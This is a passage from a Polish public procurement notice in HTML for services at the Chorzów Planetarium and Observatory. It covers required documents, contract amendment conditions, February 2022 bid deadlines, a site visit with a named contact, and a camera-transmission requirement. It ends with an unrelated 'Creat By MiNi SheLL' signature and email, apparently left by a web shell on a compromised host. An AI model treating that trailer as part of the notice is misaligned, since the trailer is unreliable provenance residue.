zamówienia, o ile Wykonawca polega na<br/>zasobach innych podmiotów w celu spełniania warunków udziału w postępowaniu, lub<br/>inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (wzór -<br/>załącznik nr 4 do SWZ),<br/>6) pełnomocnictwo wskazujące, iż osoba występująca w imieniu Wykonawcy lub<br/>Wykonawca występujący w imieniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, jest do tego upoważniona, jeżeli nie wynika to z dokumentów<br/>potwierdzających zasady reprezentacji, jeżeli dotyczy,<br/>7) oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, w przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (wzór, załącznik nr 8 do SWZ).<br/>8) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej w zakresie art. 109 ust.1 pkt 4 ustawy Pzp<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo do złożenia oferty powinno być złożone w oryginale w takiej samej formie,<br/>jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej<br/>kopii (skanu) pełnomocnictwa sporządzonego stosownie do art. 97 §2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt 2-4 oraz art. 455 ust. 2 ustawy<br/>PZP, Zamawiający, działając na podstawie art. 455 ust. 1 pkt 1 ustawy PZP, dopuszcza<br/>możliwość zmiany umowy w przypadku wystąpienia którejkolwiek z następujących<br/>okoliczności:<br/>1) w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby<br/>Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp,<br/>w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w<br/>art. 57 ustawy Pzp. W takim przypadku Wykonawca jest obowiązany wykazać<br/>Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie<br/>spełnia warunki udziału w postępowaniu, o których mowa w art. 57 ustawy Pzp, w<br/>stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie<br/>zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów,<br/>potwierdzających spełnianie warunków udziału w postępowaniu,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może<br/>nastąpić w przypadku wystąpienia zdarzeń, niezależnych od Wykonawcy, takich jak<br/>wystąpienie okoliczności siły wyższej, przez którą należy rozumieć zdarzenia<br/>niezależne od żadnej ze stron umowy, zewnętrzne, niemożliwe do zapobieżenia,<br/>które nastąpiły po dniu wejścia w życie umowy, w szczególności: wojny, akty<br/>terroryzmu, klęski żywiołowe, stan epidemii, strajki oraz akty władzy i administracji<br/>publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi<br/>maksymalnie o liczbę dni, odpowiadającą okresowi występowania okoliczności siły<br/>wyższej,<br/>3) zmiany przepisów prawa powszechnie obowiązującego, jak również wewnętrznych<br/>przepisów Zamawiającego regulujących funkcjonowanie i organizację pracy, wpływającej na zakres realizacji usług i świadczenia stron,<br/>4) zmiany wysokości wynagrodzenia Wykonawcy w sytuacji ustawowej zmiany stawki<br/>podatku od towarów i usług VAT do poszczególnych wykonanych usług stanowiących przedmiot umowy, które zostały zrealizowane po dniu wejścia w życie przepisów dokonujących zmiany stawki podatku VAT, <br/>5) W wypadku zmiany, o której mowa w ust. 1 pkt 4, wartości brutto należnego<br/>wynagrodzenia, o których mowa w § 5 ust. 1 umowy ulegnie zmianie w części niezrealizowanej, poprzez doliczenie do kwot netto podatku VAT, obliczonego według nowo obowiązujących przepisów.<br/>6) W zakresie zmian zasad bezpieczeństwa informacji, o których mowa w § 6 niniejszej<br/>umowy.<br/>7) Jeżeli wystąpią zdarzenia klasyfikowane jako siła wyższa określone w § 10 umowy,<br/>obniżenie wynagrodzenia Wykonawcy nastąpi proporcjonalnie do okresu wyłączenia<br/>świadczenia usługi oraz zmniejszenia zakresu godzin pracy ochrony, w jakim świadczona jest usługa.<br/>2. Zmiany w zakresie zmiany osób odpowiedzialnych za wykonywanie umowy ze strony<br/>Zamawiającego oraz Wykonawcy wymagają powiadomienia drugiej Strony.<br/>3. W przypadku wprowadzenia zmian w danych Wykonawcy lub Zamawiającego<br/>wynikających z dokumentów rejestrowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dopuszcza przeprowadzenie wizji lokalnej która odbędzie się w dniu 16.02.2022 r. o godz. 10:00 przy posterunku ochrony Planetarium i Obserwatorium Astronomicznego, Al. Planetarium 4 w Chorzowie. Kontakt do osoby odpowiedzialnej za wizję Pan Damian Jabłeka Tel. 665279931. <br/>2. Zamawiający wymaga zaprojektowania i wykonania systemu transmisji obrazu z kamer zainstalowanych na budynku stacji klimatologicznej i przesłaniu go do budynku głównego do pomieszczenia ochrony. Kamery i Internet zapewnia Zamawiający.<br/>Zamawiający wymaga serwisowania urządzeń do obserwacji w Stacji Klimatologicznej ( trzy kamery).

Creat By MiNi SheLL
Email: jattceo@gmail.com